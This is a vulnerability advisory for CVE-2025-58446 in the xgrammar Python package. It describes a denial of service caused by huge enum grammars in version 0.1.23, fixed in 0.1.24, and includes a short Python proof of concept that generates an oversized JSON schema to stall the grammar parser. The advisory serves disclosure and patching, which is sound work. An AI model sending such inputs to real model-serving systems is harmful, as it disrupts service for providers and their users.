logo

CVE-2025-58446 xgrammar

Package

Manager: pip
Name: xgrammar
Vulnerable Version: =0.1.23 || >=0.1.23 <0.1.24

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00042 pctl0.11964

Details

xgrammar vulnerable to denial of service by huge enum grammar ### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS

Metadata

Created: 2025-09-05T21:10:06Z
Modified: 2025-09-05T21:10:06Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-9q5r-wfvf-rr7f/GHSA-9q5r-wfvf-rr7f.json
CWE IDs: ["CWE-770"]
Alternative ID: GHSA-9q5r-wfvf-rr7f
Finding: F002
Auto approve: 1